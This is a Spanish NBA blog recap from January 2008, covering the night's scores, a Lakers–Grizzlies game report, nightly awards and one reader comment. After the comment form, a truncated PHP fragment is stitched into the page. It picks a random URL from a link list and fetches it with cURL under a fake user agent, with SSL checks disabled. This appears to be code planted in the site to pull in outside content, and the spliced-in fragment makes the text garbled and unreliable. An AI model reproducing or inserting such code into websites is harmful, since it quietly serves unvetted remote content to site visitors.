La crónica (08/01/08)

09 de January de 2008 por MagicJohnson32

Nueve partidos se disputaron anoche en la NBA, que dejaron, entre otras cosas, el duelo de colistas y el final de la racha de derrotas de los Wolves a costa de prolongar la de los Heat. Asistimos también a un nuevo triple-doble de Jason Kidd, que esta vez no impidió el triunfo de los Bobcats, y al aparente resurgir de los Bucks de la mano de Charlie Bell, que volvió a demostrar su categoría en cuanto le han dejado por la lesión de Michael Redd. Los Cavs ganaron sin despeinarse a unos Sonics que siguen cayendo y que además se llevaron el susto cuando Durant se torció el tobillo y hubo de abandonar el partido. Por su parte, los Rockets siguen remando contracorriente -es decir, sin McGrady- y ya suman tres victorias seguidas, la de anoche en pista de los Wizards. Los Lakers mantuvieron su gran momento en Memphis con una soberbia actuación de Fisher y sólo suman una derrota más que los líderes de Conferencia. Chicago volvió al fondo de la Central Division con una dolorosa derrota ante los Knicks, que lograron un 14-2 para acabar el partido y consumar una sorprendente remontada que además supuso la venganza de Eddy Curry, al fin brillante ante su ex equipo. Los Pacers no levantan cabeza y sumaron otra clara derrota en pista de los Jazz, que desde el primer momento dejaron sin opción a su rival con un 19-40 en el cuarto inicial. La jornada se cerró en California, con un trabajado triunfo de los Kings, otros que tratan de sobrevivir a las adversidades, ante unos Magic que ya no funcionan como a principios de temporada.

Tras el resumen de la madrugada, os dejamos con los resultados de todos los partidos y los detalles más interesantes de lo acontecido:

Resultados

Nets 99 – 115 Bobcats

Bucks 87 – 83 Sixers

Sonics 79 – 95 Cavs

Rockets 92 – 84 Wizards

Heat 91 – 101 T’Wolves

Knicks 105 – 100 Bulls

Pacers 89 – 111 Jazz

Magic 100 – 104 Kings

 

El partido de la jornada

Lakers 117 – 101 Grizzlies

Partido cómodo para Phil Jackson y sus chicos. La ventaja final fue la misma que la cosechada en un primer cuarto para enmarcar por parte de los Lakers, en el cual Fisher acabó con 13 puntos y Bryant con 12, este último gracias a la candidez de sus defensores cayendo en sus fintas y permitiéndole ir a la línea de tiros libres muy a menudo.

millermiliciclakers

La ventaja llegó a ser de 26 puntos mediado el segundo cuarto, pero varias acciones de Mike Miller y Darko Milicic dejaron el marcador 61-47 al descanso, tras el cual los de la avenida Figueroa se dedicaron a dejar pasar los minutos en un intercambio de canastas.

En los Lakers cabe destacar el casi perfecto partido de Fisher, que acabó con 26 puntos con una serie de 10 de 11 en tiros, bien secundado por Kobe con 25-3-6 y 5 robos de balón, que sólo es un dato estadístico que no refleja del todo su gran intensidad defensiva en el día de ayer, pese a un mal dia en el tiro; Lamar Odom hizo uno de esos partidos típicos en él, más preocupado de rebotear y organizar el juego del equipo, y acabó con un 10-15-6; Bynum y Walton

también alcanzaron los 10 puntos, en el caso del pívot con 9 rebotes en su cuenta. Con actuaciones como la de ayer, se afianzan como uno de los equipos que desarrollan un juego más elaborado a la vez que practican una defensa dura; aunque esto ya fue así el mes de enero del 2007. Veremos qué sucede en éste.

Por Memphis, la mayor preocupación debe ser su pasividad defensiva, ya que ofensivamente han mejorado con la llegada de Conley, que hace a Milicic un jugador decente de cara al aro. La anotación y los tiros estuvieron muy repartidos en el conjunto de Iavaroni: 6 jugadores alcanzaron la decena de puntos y 5 de ellos también dispusieron al menos de una decena de tiros. Mike Miller con 18-8-6, Gasol 18-12 y Milicic 12-11-4 y 4 tapones destacan sobre el resto, aunque el serbio demostró una vez más su falta de cabeza para contener su número de faltas y el de Sant Boi se mostró apático durante gran parte del encuentro. Conley, con 11-5-6 y una buena dirección de juego, junto con un Warrick (15 puntos y 5 rebotes) que reclama más minutos de juego cada vez que salta a la pista, fueron la nota más agradable para Memphis. Rudy Gay cuajó un mal encuentro, no encontró una vía de anotación y perdió 5 balones. Sus 15 puntos son una anécdota en el partido, ya que no tuvo su habitual influencia en el mismo.

 

Los premios de la noche

El MVP de la noche: Dwight Howard mantiene el impresionante nivel que está mostrando durante toda la temporada, lo que le está valiendo para ser considero uno de los favoritos principales al galardón de MVP de la temporada. dfishermemphisEsta noche no ha podido guiar a su equipo a la victoria pero ha luchado lo indecible con 29 puntos, 15 rebotes y un 11 de 13 en tiros de campo.

El rookie de la noche: Nuevamente Kevin Durant es el rookie más destacado de la jornada después de haber anotado 20 puntos en la derrota de los Sonics con buenos porcentajes de tiro. Eso sí, esta noche hay que destacar las actuaciones de Mike Conley, de Memphis, y Daequan Cook, de Miami, jugadores que están mejorando a marchas forzadas y a los que hay que tener muy en cuenta en el futuro.

La sorpresa de la noche: Muchos jugadores optan hoy a este galardón. Los 24 puntos de Luther Head en ausencia de T-Mac, los 15 puntos y 10 rebotes de un Villanueva que necesitaba una buena actuación para recuperar la confianza, los 29 puntos y 8 rebotes de Eddy Curry liderando a su equipo a la victoria frente los Bulls, etc… Pero si hay que destacar una actuación sin duda seria el 10 de 11 en tiros de campo de Derek Fisher, que ha acabado anotando 26 puntos en la victoria angelina.

La decepción de la noche: El 0 de 7 en 20 minutos de Yi Jianlian es sin duda una actuación horrorosa, pero el bajón en el nivel de Jermaine O’Neal le hace merecer aún más el galardón. Esta noche 9 tristes puntos y 4 rebotes para el que se supone es el jugador franquicia. ¿El principio del fin?

Acabamos como siempre con las 10 mejores acciones de la noche:

Comenta

Un comentario a esta entrada

  1. Olafur dice:
    #1

    Gracias a la candidez de sus defensores no, gracias a la bula arbitral que tiene Kobe, tremenda la boina que le pispan a Milicic.

    Por cierto demoledor Fisher, la misma mano que Conley juas juas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>